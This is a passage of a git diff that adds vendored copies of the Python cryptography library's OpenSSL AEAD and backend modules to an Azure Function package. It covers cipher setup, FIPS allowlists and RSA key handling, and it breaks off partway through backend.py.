a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/aead.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/aead.py new file mode 100644 index 0000000..68835da --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/aead.py @@ -0,0 +1,251 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import InvalidTag + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + from cryptography.hazmat.primitives.ciphers.aead import ( + AESCCM, + AESGCM, + AESOCB3, + AESSIV, + ChaCha20Poly1305, + ) + + _AEAD_TYPES = typing.Union[ + AESCCM, AESGCM, AESOCB3, AESSIV, ChaCha20Poly1305 + ] + +_ENCRYPT = 1 +_DECRYPT = 0 + + +def _aead_cipher_name(cipher: "_AEAD_TYPES") -> bytes: + from cryptography.hazmat.primitives.ciphers.aead import ( + AESCCM, + AESGCM, + AESOCB3, + AESSIV, + ChaCha20Poly1305, + ) + + if isinstance(cipher, ChaCha20Poly1305): + return b"chacha20-poly1305" + elif isinstance(cipher, AESCCM): + return f"aes-{len(cipher._key) * 8}-ccm".encode("ascii") + elif isinstance(cipher, AESOCB3): + return f"aes-{len(cipher._key) * 8}-ocb".encode("ascii") + elif isinstance(cipher, AESSIV): + return f"aes-{len(cipher._key) * 8 // 2}-siv".encode("ascii") + else: + assert isinstance(cipher, AESGCM) + return f"aes-{len(cipher._key) * 8}-gcm".encode("ascii") + + +def _evp_cipher(cipher_name: bytes, backend: "Backend"): + if cipher_name.endswith(b"-siv"): + evp_cipher = backend._lib.EVP_CIPHER_fetch( + backend._ffi.NULL, + cipher_name, + backend._ffi.NULL, + ) + backend.openssl_assert(evp_cipher != backend._ffi.NULL) + evp_cipher = backend._ffi.gc(evp_cipher, backend._lib.EVP_CIPHER_free) + else: + evp_cipher = backend._lib.EVP_get_cipherbyname(cipher_name) + backend.openssl_assert(evp_cipher != backend._ffi.NULL) + + return evp_cipher + + +def _aead_setup( + backend: "Backend", + cipher_name: bytes, + key: bytes, + nonce: bytes, + tag: typing.Optional[bytes], + tag_len: int, + operation: int, +): + evp_cipher = _evp_cipher(cipher_name, backend) + ctx = backend._lib.EVP_CIPHER_CTX_new() + ctx = backend._ffi.gc(ctx, backend._lib.EVP_CIPHER_CTX_free) + res = backend._lib.EVP_CipherInit_ex( + ctx, + evp_cipher, + backend._ffi.NULL, + backend._ffi.NULL, + backend._ffi.NULL, + int(operation == _ENCRYPT), + ) + backend.openssl_assert(res != 0) + res = backend._lib.EVP_CIPHER_CTX_set_key_length(ctx, len(key)) + backend.openssl_assert(res != 0) + res = backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, + backend._lib.EVP_CTRL_AEAD_SET_IVLEN, + len(nonce), + backend._ffi.NULL, + ) + backend.openssl_assert(res != 0) + if operation == _DECRYPT: + assert tag is not None + res = backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, backend._lib.EVP_CTRL_AEAD_SET_TAG, len(tag), tag + ) + backend.openssl_assert(res != 0) + elif cipher_name.endswith(b"-ccm"): + res = backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, backend._lib.EVP_CTRL_AEAD_SET_TAG, tag_len, backend._ffi.NULL + ) + backend.openssl_assert(res != 0) + + nonce_ptr = backend._ffi.from_buffer(nonce) + key_ptr = backend._ffi.from_buffer(key) + res = backend._lib.EVP_CipherInit_ex( + ctx, + backend._ffi.NULL, + backend._ffi.NULL, + key_ptr, + nonce_ptr, + int(operation == _ENCRYPT), + ) + backend.openssl_assert(res != 0) + return ctx + + +def _set_length(backend: "Backend", ctx, data_len: int) -> None: + intptr = backend._ffi.new("int *") + res = backend._lib.EVP_CipherUpdate( + ctx, backend._ffi.NULL, intptr, backend._ffi.NULL, data_len + ) + backend.openssl_assert(res != 0) + + +def _process_aad(backend: "Backend", ctx, associated_data: bytes) -> None: + outlen = backend._ffi.new("int *") + res = backend._lib.EVP_CipherUpdate( + ctx, backend._ffi.NULL, outlen, associated_data, len(associated_data) + ) + backend.openssl_assert(res != 0) + + +def _process_data(backend: "Backend", ctx, data: bytes) -> bytes: + outlen = backend._ffi.new("int *") + buf = backend._ffi.new("unsigned char[]", len(data)) + res = backend._lib.EVP_CipherUpdate(ctx, buf, outlen, data, len(data)) + if res == 0: + # AES SIV can error here if the data is invalid on decrypt + backend._consume_errors() + raise InvalidTag + return backend._ffi.buffer(buf, outlen[0])[:] + + +def _encrypt( + backend: "Backend", + cipher: "_AEAD_TYPES", + nonce: bytes, + data: bytes, + associated_data: typing.List[bytes], + tag_length: int, +) -> bytes: + from cryptography.hazmat.primitives.ciphers.aead import AESCCM, AESSIV + + cipher_name = _aead_cipher_name(cipher) + ctx = _aead_setup( + backend, cipher_name, cipher._key, nonce, None, tag_length, _ENCRYPT + ) + # CCM requires us to pass the length of the data before processing anything + # However calling this with any other AEAD results in an error + if isinstance(cipher, AESCCM): + _set_length(backend, ctx, len(data)) + + for ad in associated_data: + _process_aad(backend, ctx, ad) + processed_data = _process_data(backend, ctx, data) + outlen = backend._ffi.new("int *") + # All AEADs we support besides OCB are streaming so they return nothing + # in finalization. OCB can return up to (16 byte block - 1) bytes so + # we need a buffer here too. + buf = backend._ffi.new("unsigned char[]", 16) + res = backend._lib.EVP_CipherFinal_ex(ctx, buf, outlen) + backend.openssl_assert(res != 0) + processed_data += backend._ffi.buffer(buf, outlen[0])[:] + tag_buf = backend._ffi.new("unsigned char[]", tag_length) + res = backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, backend._lib.EVP_CTRL_AEAD_GET_TAG, tag_length, tag_buf + ) + backend.openssl_assert(res != 0) + tag = backend._ffi.buffer(tag_buf)[:] + + if isinstance(cipher, AESSIV): + # RFC 5297 defines the output as IV || C, where the tag we generate is + # the "IV" and C is the ciphertext. This is the opposite of our + # other AEADs, which are Ciphertext || Tag + backend.openssl_assert(len(tag) == 16) + return tag + processed_data + else: + return processed_data + tag + + +def _decrypt( + backend: "Backend", + cipher: "_AEAD_TYPES", + nonce: bytes, + data: bytes, + associated_data: typing.List[bytes], + tag_length: int, +) -> bytes: + from cryptography.hazmat.primitives.ciphers.aead import AESCCM, AESSIV + + if len(data) < tag_length: + raise InvalidTag + + if isinstance(cipher, AESSIV): + # RFC 5297 defines the output as IV || C, where the tag we generate is + # the "IV" and C is the ciphertext. This is the opposite of our + # other AEADs, which are Ciphertext || Tag + tag = data[:tag_length] + data = data[tag_length:] + else: + tag = data[-tag_length:] + data = data[:-tag_length] + cipher_name = _aead_cipher_name(cipher) + ctx = _aead_setup( + backend, cipher_name, cipher._key, nonce, tag, tag_length, _DECRYPT + ) + # CCM requires us to pass the length of the data before processing anything + # However calling this with any other AEAD results in an error + if isinstance(cipher, AESCCM): + _set_length(backend, ctx, len(data)) + + for ad in associated_data: + _process_aad(backend, ctx, ad) + # CCM has a different error path if the tag doesn't match. Errors are + # raised in Update and Final is irrelevant. + if isinstance(cipher, AESCCM): + outlen = backend._ffi.new("int *") + buf = backend._ffi.new("unsigned char[]", len(data)) + res = backend._lib.EVP_CipherUpdate(ctx, buf, outlen, data, len(data)) + if res != 1: + backend._consume_errors() + raise InvalidTag + + processed_data = backend._ffi.buffer(buf, outlen[0])[:] + else: + processed_data = _process_data(backend, ctx, data) + outlen = backend._ffi.new("int *") + # OCB can return up to 15 bytes (16 byte block - 1) in finalization + buf = backend._ffi.new("unsigned char[]", 16) + res = backend._lib.EVP_CipherFinal_ex(ctx, buf, outlen) + processed_data += backend._ffi.buffer(buf, outlen[0])[:] + if res == 0: + backend._consume_errors() + raise InvalidTag + + return processed_data diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/backend.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/backend.py new file mode 100644 index 0000000..89371a6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/backend.py @@ -0,0 +1,2537 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import collections +import contextlib +import itertools +import typing +import warnings +from contextlib import contextmanager + +from cryptography import utils, x509 +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.backends.openssl import aead +from cryptography.hazmat.backends.openssl.ciphers import _CipherContext +from cryptography.hazmat.backends.openssl.cmac import _CMACContext +from cryptography.hazmat.backends.openssl.dh import ( + _DHParameters, + _DHPrivateKey, + _DHPublicKey, + _dh_params_dup, +) +from cryptography.hazmat.backends.openssl.dsa import ( + _DSAParameters, + _DSAPrivateKey, + _DSAPublicKey, +) +from cryptography.hazmat.backends.openssl.ec import ( + _EllipticCurvePrivateKey, + _EllipticCurvePublicKey, +) +from cryptography.hazmat.backends.openssl.ed25519 import ( + _Ed25519PrivateKey, + _Ed25519PublicKey, +) +from cryptography.hazmat.backends.openssl.ed448 import ( + _ED448_KEY_SIZE, + _Ed448PrivateKey, + _Ed448PublicKey, +) +from cryptography.hazmat.backends.openssl.hashes import _HashContext +from cryptography.hazmat.backends.openssl.hmac import _HMACContext +from cryptography.hazmat.backends.openssl.poly1305 import ( + _POLY1305_KEY_SIZE, + _Poly1305Context, +) +from cryptography.hazmat.backends.openssl.rsa import ( + _RSAPrivateKey, + _RSAPublicKey, +) +from cryptography.hazmat.backends.openssl.x25519 import ( + _X25519PrivateKey, + _X25519PublicKey, +) +from cryptography.hazmat.backends.openssl.x448 import ( + _X448PrivateKey, + _X448PublicKey, +) +from cryptography.hazmat.bindings._rust import ( + x509 as rust_x509, +) +from cryptography.hazmat.bindings.openssl import binding +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives._asymmetric import AsymmetricPadding +from cryptography.hazmat.primitives.asymmetric import ( + dh, + dsa, + ec, + ed25519, + ed448, + rsa, + x25519, + x448, +) +from cryptography.hazmat.primitives.asymmetric.padding import ( + MGF1, + OAEP, + PKCS1v15, + PSS, +) +from cryptography.hazmat.primitives.asymmetric.types import ( + CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES, + PRIVATE_KEY_TYPES, + PUBLIC_KEY_TYPES, +) +from cryptography.hazmat.primitives.ciphers import ( + BlockCipherAlgorithm, + CipherAlgorithm, +) +from cryptography.hazmat.primitives.ciphers.algorithms import ( + AES, + ARC4, + Camellia, + ChaCha20, + SM4, + TripleDES, + _BlowfishInternal, + _CAST5Internal, + _IDEAInternal, + _SEEDInternal, +) +from cryptography.hazmat.primitives.ciphers.modes import ( + CBC, + CFB, + CFB8, + CTR, + ECB, + GCM, + Mode, + OFB, + XTS, +) +from cryptography.hazmat.primitives.kdf import scrypt +from cryptography.hazmat.primitives.serialization import pkcs7, ssh +from cryptography.hazmat.primitives.serialization.pkcs12 import ( + PKCS12Certificate, + PKCS12KeyAndCertificates, + _ALLOWED_PKCS12_TYPES, + _PKCS12_CAS_TYPES, +) + + +_MemoryBIO = collections.namedtuple("_MemoryBIO", ["bio", "char_ptr"]) + + +# Not actually supported, just used as a marker for some serialization tests. +class _RC2: + pass + + +class Backend: + """ + OpenSSL API binding interfaces. + """ + + name = "openssl" + + # FIPS has opinions about acceptable algorithms and key sizes, but the + # disallowed algorithms are still present in OpenSSL. They just error if + # you try to use them. To avoid that we allowlist the algorithms in + # FIPS 140-3. This isn't ideal, but FIPS 140-3 is trash so here we are. + _fips_aead = { + b"aes-128-ccm", + b"aes-192-ccm", + b"aes-256-ccm", + b"aes-128-gcm", + b"aes-192-gcm", + b"aes-256-gcm", + } + # TripleDES encryption is disallowed/deprecated throughout 2023 in + # FIPS 140-3. To keep it simple we denylist any use of TripleDES (TDEA). + _fips_ciphers = (AES,) + # Sometimes SHA1 is still permissible. That logic is contained + # within the various *_supported methods. + _fips_hashes = ( + hashes.SHA224, + hashes.SHA256, + hashes.SHA384, + hashes.SHA512, + hashes.SHA512_224, + hashes.SHA512_256, + hashes.SHA3_224, + hashes.SHA3_256, + hashes.SHA3_384, + hashes.SHA3_512, + hashes.SHAKE128, + hashes.SHAKE256, + ) + _fips_ecdh_curves = ( + ec.SECP224R1, + ec.SECP256R1, + ec.SECP384R1, + ec.SECP521R1, + ) + _fips_rsa_min_key_size = 2048 + _fips_rsa_min_public_exponent = 65537 + _fips_dsa_min_modulus = 1 << 2048 + _fips_dh_min_key_size = 2048 + _fips_dh_min_modulus = 1 << _fips_dh_min_key_size + + def __init__(self): + self._binding = binding.Binding() + self._ffi = self._binding.ffi + self._lib = self._binding.lib + self._rsa_skip_check_key = False + self._fips_enabled = self._is_fips_enabled() + + self._cipher_registry = {} + self._register_default_ciphers() + if self._fips_enabled and self._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE: + warnings.warn( + "OpenSSL FIPS mode is enabled. Can't enable DRBG fork safety.", + UserWarning, + ) + else: + self.activate_osrandom_engine() + self._dh_types = [self._lib.EVP_PKEY_DH] + if self._lib.Cryptography_HAS_EVP_PKEY_DHX: + self._dh_types.append(self._lib.EVP_PKEY_DHX) + + def __repr__(self) -> str: + return "".format( + self.openssl_version_text(), self._fips_enabled + ) + + def openssl_assert( + self, + ok: bool, + errors: typing.Optional[typing.List[binding._OpenSSLError]] = None, + ) -> None: + return binding._openssl_assert(self._lib, ok, errors=errors) + + def _is_fips_enabled(self) -> bool: + if self._lib.Cryptography_HAS_300_FIPS: + mode = self._lib.EVP_default_properties_is_fips_enabled( + self._ffi.NULL + ) + else: + mode = getattr(self._lib, "FIPS_mode", lambda: 0)() + + if mode == 0: + # OpenSSL without FIPS pushes an error on the error stack + self._lib.ERR_clear_error() + return bool(mode) + + def _enable_fips(self) -> None: + # This function enables FIPS mode for OpenSSL 3.0.0 on installs that + # have the FIPS provider installed properly. + self._binding._enable_fips() + assert self._is_fips_enabled() + self._fips_enabled = self._is_fips_enabled() + + def activate_builtin_random(self) -> None: + if self._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE: + # Obtain a new structural reference. + e = self._lib.ENGINE_get_default_RAND() + if e != self._ffi.NULL: + self._lib.ENGINE_unregister_RAND(e) + # Reset the RNG to use the built-in. + res = self._lib.RAND_set_rand_method(self._ffi.NULL) + self.openssl_assert(res == 1) + # decrement the structural reference from get_default_RAND + res = self._lib.ENGINE_finish(e) + self.openssl_assert(res == 1) + + @contextlib.contextmanager + def _get_osurandom_engine(self): + # Fetches an engine by id and returns it. This creates a structural + # reference. + e = self._lib.ENGINE_by_id(self._lib.Cryptography_osrandom_engine_id) + self.openssl_assert(e != self._ffi.NULL) + # Initialize the engine for use. This adds a functional reference. + res = self._lib.ENGINE_init(e) + self.openssl_assert(res == 1) + + try: + yield e + finally: + # Decrement the structural ref incremented by ENGINE_by_id. + res = self._lib.ENGINE_free(e) + self.openssl_assert(res == 1) + # Decrement the functional ref incremented by ENGINE_init. + res = self._lib.ENGINE_finish(e) + self.openssl_assert(res == 1) + + def activate_osrandom_engine(self) -> None: + if self._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE: + # Unregister and free the current engine. + self.activate_builtin_random() + with self._get_osurandom_engine() as e: + # Set the engine as the default RAND provider. + res = self._lib.ENGINE_set_default_RAND(e) + self.openssl_assert(res == 1) + # Reset the RNG to use the engine + res = self._lib.RAND_set_rand_method(self._ffi.NULL) + self.openssl_assert(res == 1) + + def osrandom_engine_implementation(self) -> str: + buf = self._ffi.new("char[]", 64) + with self._get_osurandom_engine() as e: + res = self._lib.ENGINE_ctrl_cmd( + e, b"get_implementation", len(buf), buf, self._ffi.NULL, 0 + ) + self.openssl_assert(res > 0) + return self._ffi.string(buf).decode("ascii") + + def openssl_version_text(self) -> str: + """ + Friendly string name of the loaded OpenSSL library. This is not + necessarily the same version as it was compiled against. + + Example: OpenSSL 1.1.1d 10 Sep 2019 + """ + return self._ffi.string( + self._lib.OpenSSL_version(self._lib.OPENSSL_VERSION) + ).decode("ascii") + + def openssl_version_number(self) -> int: + return self._lib.OpenSSL_version_num() + + def create_hmac_ctx( + self, key: bytes, algorithm: hashes.HashAlgorithm + ) -> _HMACContext: + return _HMACContext(self, key, algorithm) + + def _evp_md_from_algorithm(self, algorithm: hashes.HashAlgorithm): + if algorithm.name == "blake2b" or algorithm.name == "blake2s": + alg = "{}{}".format( + algorithm.name, algorithm.digest_size * 8 + ).encode("ascii") + else: + alg = algorithm.name.encode("ascii") + + evp_md = self._lib.EVP_get_digestbyname(alg) + return evp_md + + def _evp_md_non_null_from_algorithm(self, algorithm: hashes.HashAlgorithm): + evp_md = self._evp_md_from_algorithm(algorithm) + self.openssl_assert(evp_md != self._ffi.NULL) + return evp_md + + def hash_supported(self, algorithm: hashes.HashAlgorithm) -> bool: + if self._fips_enabled and not isinstance(algorithm, self._fips_hashes): + return False + + evp_md = self._evp_md_from_algorithm(algorithm) + return evp_md != self._ffi.NULL + + def signature_hash_supported( + self, algorithm: hashes.HashAlgorithm + ) -> bool: + # Dedicated check for hashing algorithm use in message digest for + # signatures, e.g. RSA PKCS#1 v1.5 SHA1 (sha1WithRSAEncryption). + if self._fips_enabled and isinstance(algorithm, hashes.SHA1): + return False + return self.hash_supported(algorithm) + + def scrypt_supported(self) -> bool: + if self._fips_enabled: + return False + else: + return self._lib.Cryptography_HAS_SCRYPT == 1 + + def hmac_supported(self, algorithm: hashes.HashAlgorithm) -> bool: + # FIPS mode still allows SHA1 for HMAC + if self._fips_enabled and isinstance(algorithm, hashes.SHA1): + return True + + return self.hash_supported(algorithm) + + def create_hash_ctx( + self, algorithm: hashes.HashAlgorithm + ) -> hashes.HashContext: + return _HashContext(self, algorithm) + + def cipher_supported(self, cipher: CipherAlgorithm, mode: Mode) -> bool: + if self._fips_enabled: + # FIPS mode requires AES. TripleDES is disallowed/deprecated in + # FIPS 140-3. + if not isinstance(cipher, self._fips_ciphers): + return False + + try: + adapter = self._cipher_registry[type(cipher), type(mode)] + except KeyError: + return False + evp_cipher = adapter(self, cipher, mode) + return self._ffi.NULL != evp_cipher + + def register_cipher_adapter(self, cipher_cls, mode_cls, adapter): + if (cipher_cls, mode_cls) in self._cipher_registry: + raise ValueError( + "Duplicate registration for: {} {}.".format( + cipher_cls, mode_cls + ) + ) + self._cipher_registry[cipher_cls, mode_cls] = adapter + + def _register_default_ciphers(self) -> None: + for mode_cls in [CBC, CTR, ECB, OFB, CFB, CFB8, GCM]: + self.register_cipher_adapter( + AES, + mode_cls, + GetCipherByName("{cipher.name}-{cipher.key_size}-{mode.name}"), + ) + for mode_cls in [CBC, CTR, ECB, OFB, CFB]: + self.register_cipher_adapter( + Camellia, + mode_cls, + GetCipherByName("{cipher.name}-{cipher.key_size}-{mode.name}"), + ) + for mode_cls in [CBC, CFB, CFB8, OFB]: + self.register_cipher_adapter( + TripleDES, mode_cls, GetCipherByName("des-ede3-{mode.name}") + ) + self.register_cipher_adapter( + TripleDES, ECB, GetCipherByName("des-ede3") + ) + for mode_cls in [CBC, CFB, OFB, ECB]: + self.register_cipher_adapter( + _BlowfishInternal, mode_cls, GetCipherByName("bf-{mode.name}") + ) + for mode_cls in [CBC, CFB, OFB, ECB]: + self.register_cipher_adapter( + _SEEDInternal, mode_cls, GetCipherByName("seed-{mode.name}") + ) + for cipher_cls, mode_cls in itertools.product( + [_CAST5Internal, _IDEAInternal], + [CBC, OFB, CFB, ECB], + ): + self.register_cipher_adapter( + cipher_cls, + mode_cls, + GetCipherByName("{cipher.name}-{mode.name}"), + ) + self.register_cipher_adapter(ARC4, type(None), GetCipherByName("rc4")) + # We don't actually support RC2, this is just used by some tests. + self.register_cipher_adapter(_RC2, type(None), GetCipherByName("rc2")) + self.register_cipher_adapter( + ChaCha20, type(None), GetCipherByName("chacha20") + ) + self.register_cipher_adapter(AES, XTS, _get_xts_cipher) + for mode_cls in [ECB, CBC, OFB, CFB, CTR]: + self.register_cipher_adapter( + SM4, mode_cls, GetCipherByName("sm4-{mode.name}") + ) + + def create_symmetric_encryption_ctx( + self, cipher: CipherAlgorithm, mode: Mode + ) -> _CipherContext: + return _CipherContext(self, cipher, mode, _CipherContext._ENCRYPT) + + def create_symmetric_decryption_ctx( + self, cipher: CipherAlgorithm, mode: Mode + ) -> _CipherContext: + return _CipherContext(self, cipher, mode, _CipherContext._DECRYPT) + + def pbkdf2_hmac_supported(self, algorithm: hashes.HashAlgorithm) -> bool: + return self.hmac_supported(algorithm) + + def derive_pbkdf2_hmac( + self, + algorithm: hashes.HashAlgorithm, + length: int, + salt: bytes, + iterations: int, + key_material: bytes, + ) -> bytes: + buf = self._ffi.new("unsigned char[]", length) + evp_md = self._evp_md_non_null_from_algorithm(algorithm) + key_material_ptr = self._ffi.from_buffer(key_material) + res = self._lib.PKCS5_PBKDF2_HMAC( + key_material_ptr, + len(key_material), + salt, + len(salt), + iterations, + evp_md, + length, + buf, + ) + self.openssl_assert(res == 1) + return self._ffi.buffer(buf)[:] + + def _consume_errors(self) -> typing.List[binding._OpenSSLError]: + return binding._consume_errors(self._lib) + + def _consume_errors_with_text( + self, + ) -> typing.List[binding._OpenSSLErrorWithText]: + return binding._consume_errors_with_text(self._lib) + + def _bn_to_int(self, bn) -> int: + assert bn != self._ffi.NULL + self.openssl_assert(not self._lib.BN_is_negative(bn)) + + bn_num_bytes = self._lib.BN_num_bytes(bn) + bin_ptr = self._ffi.new("unsigned char[]", bn_num_bytes) + bin_len = self._lib.BN_bn2bin(bn, bin_ptr) + # A zero length means the BN has value 0 + self.openssl_assert(bin_len >= 0) + val = int.from_bytes(self._ffi.buffer(bin_ptr)[:bin_len], "big") + return val + + def _int_to_bn(self, num: int, bn=None): + """ + Converts a python integer to a BIGNUM. The returned BIGNUM will not + be garbage collected (to support adding them to structs that take + ownership of the object). Be sure to register it for GC if it will + be discarded after use. + """ + assert bn is None or bn != self._ffi.NULL + + if bn is None: + bn = self._ffi.NULL + + binary = num.to_bytes(int(num.bit_length() / 8.0 + 1), "big") + bn_ptr = self._lib.BN_bin2bn(binary, len(binary), bn) + self.openssl_assert(bn_ptr != self._ffi.NULL) + return bn_ptr + + def generate_rsa_private_key( + self, public_exponent: int, key_size: int + ) -> rsa.RSAPrivateKey: + rsa._verify_rsa_parameters(public_exponent, key_size) + + rsa_cdata = self._lib.RSA_new() + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + + bn = self._int_to_bn(public_exponent) + bn = self._ffi.gc(bn, self._lib.BN_free) + + res = self._lib.RSA_generate_key_ex( + rsa_cdata, key_size, bn, self._ffi.NULL + ) + self.openssl_assert(res == 1) + evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata) + + return _RSAPrivateKey( + self, rsa_cdata, evp_pkey, self._rsa_skip_check_key + ) + + def generate_rsa_parameters_supported( + self, public_exponent: int, key_size: int + ) -> bool: + return ( + public_exponent >= 3 + and public_exponent & 1 != 0 + and key_size >= 512 + ) + + def load_rsa_private_numbers( + self, numbers: rsa.RSAPrivateNumbers + ) -> rsa.RSAPrivateKey: + rsa._check_private_key_components( + numbers.p, + numbers.q, + numbers.d, + numbers.dmp1, + numbers.dmq1, + numbers.iqmp, + numbers.public_numbers.e, + numbers.public_numbers.n, + ) + rsa_cdata = self._lib.RSA_new() + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + p = self._int_to_bn(numbers.p) + q = self._int_to_bn(numbers.q) + d = self._int_to_bn(numbers.d) + dmp1 = self._int_to_bn(numbers.dmp1) + dmq1 = self._int_to_bn(numbers.dmq1) + iqmp = self._int_to_bn(numbers.iqmp) + e = self._int_to_bn(numbers.public_numbers.e) + n = self._int_to_bn(numbers.public_numbers.n) + res = self._lib.RSA_set0_factors(rsa_cdata, p, q) + self.openssl_assert(res == 1) + res = self._lib.RSA_set0_key(rsa_cdata, n, e, d) + self.openssl_assert(res == 1) + res = self._lib.RSA_set0_crt_params(rsa_cdata, dmp1, dmq1, iqmp) + self.openssl_assert(res == 1) + evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata) + + return _RSAPrivateKey( + self, rsa_cdata, evp_pkey, self._rsa_skip_check_key + ) + + def load_rsa_public_numbers( + self, numbers: rsa.RSAPublicNumbers + ) -> rsa.RSAPublicKey: + rsa._check_public_key_components(numbers.e, numbers.n) + rsa_cdata = self._lib.RSA_new() + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + e = self._int_to_bn(numbers.e) + n = self._int_to_bn(numbers.n) + res = self._lib.RSA_set0_key(rsa_cdata, n, e, self._ffi.NULL) + self.openssl_assert(res == 1) + evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata) + + return _RSAPublicKey(self, rsa_cdata, evp_pkey) + + def _create_evp_pkey_gc(self): + evp_pkey = self._lib.EVP_PKEY_new() + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + return evp_pkey + + def _rsa_cdata_to_evp_pkey(self, rsa_cdata): + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set1_RSA(evp_pkey, rsa_cdata) + self.openssl_assert(res == 1) + return evp_pkey + + def _bytes_to_bio(self, data: bytes): + """ + Return a _MemoryBIO namedtuple of (BIO, char*). + + The char* is the storage for the BIO and it must stay alive until the + BIO is finished with. + """ + data_ptr = self._ffi.from_buffer(data) + bio = self._lib.BIO_new_mem_buf(data_ptr, len(data)) + self.openssl_assert(bio != self._ffi.NULL) + + return _MemoryBIO(self._ffi.gc(bio, self._lib.BIO_free), data_ptr) + + def _create_mem_bio_gc(self): + """ + Creates an empty memory BIO. + """ + bio_method = self._lib.BIO_s_mem() + self.openssl_assert(bio_method != self._ffi.NULL) + bio = self._lib.BIO_new(bio_method) + self.openssl_assert(bio != self._ffi.NULL) + bio = self._ffi.gc(bio, self._lib.BIO_free) + return bio + + def _read_mem_bio(self, bio) -> bytes: + """ + Reads a memory BIO. This only works on memory BIOs. + """ + buf = self._ffi.new("char **") + buf_len = self._lib.BIO_get_mem_data(bio, buf) + self.openssl_assert(buf_len > 0) + self.openssl_assert(buf[0] != self._ffi.NULL) + bio_data = self._ffi.buffer(buf[0], buf_len)[:] + return bio_data + + def _evp_pkey_to_private_key(self, evp_pkey) -> PRIVATE_KEY_TYPES: + """ + Return the appropriate type of PrivateKey given an evp_pkey cdata + pointer. + """ + + key_type = self._lib.EVP_PKEY_id(evp_pkey) + + if key_type == self._lib.EVP_PKEY_RSA: + rsa_cdata = self._lib.EVP_PKEY_get1_RSA(evp_pkey) + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + return _RSAPrivateKey( + self, rsa_cdata, evp_pkey, self._rsa_skip_check_key + ) + elif ( + key_type == self._lib.EVP_PKEY_RSA_PSS + and not self._lib.CRYPTOGRAPHY_IS_LIBRESSL + and not self._lib.CRYPTOGRAPHY_IS_BORINGSSL + and not self._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111E + ): + # At the moment the way we handle RSA PSS keys is to strip the + # PSS constraints from them and treat them as normal RSA keys + # Unfortunately the RSA * itself tracks this data so we need to + # extract, serialize, and reload it without the constraints. + rsa_cdata = self._lib.EVP_PKEY_get1_RSA(evp_pkey) + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + bio = self._create_mem_bio_gc() + res = self._lib.i2d_RSAPrivateKey_bio(bio, rsa_cdata) + self.openssl_assert(res == 1) + return self.load_der_private_key( + self._read_mem_bio(bio), password=None + ) + elif key_type == self._lib.EVP_PKEY_DSA: + dsa_cdata = self._lib.EVP_PKEY_get1_DSA(evp_pkey) + self.openssl_assert(dsa_cdata != self._ffi.NULL) + dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free) + return _DSAPrivateKey(self, dsa_cdata, evp_pkey) + elif key_type == self._lib.EVP_PKEY_EC: + ec_cdata = self._lib.EVP_PKEY_get1_EC_KEY(evp_pkey) + self.openssl_assert(ec_cdata != self._ffi.NULL) + ec_cdata = self._ffi.gc(ec_cdata, self._lib.EC_KEY_free) + return _EllipticCurvePrivateKey(self, ec_cdata, evp_pkey) + elif key_type in self._dh_types: + dh_cdata = self._lib.EVP_PKEY_get1_DH(evp_pkey) + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + return _DHPrivateKey(self, dh_cdata, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_ED25519", None): + # EVP_PKEY_ED25519 is not present in OpenSSL < 1.1.1 + return _Ed25519PrivateKey(self, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_X448", None): + # EVP_PKEY_X448 is not present in OpenSSL < 1.1.1 + return _X448PrivateKey(self, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_X25519", None): + # EVP_PKEY_X25519 is not present in OpenSSL < 1.1.0 + return _X25519PrivateKey(self, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_ED448", None): + # EVP_PKEY_ED448 is not present in OpenSSL < 1.1.1 + return _Ed448PrivateKey(self, evp_pkey) + else: + raise UnsupportedAlgorithm("Unsupported key type.") + + def _evp_pkey_to_public_key(self, evp_pkey) -> 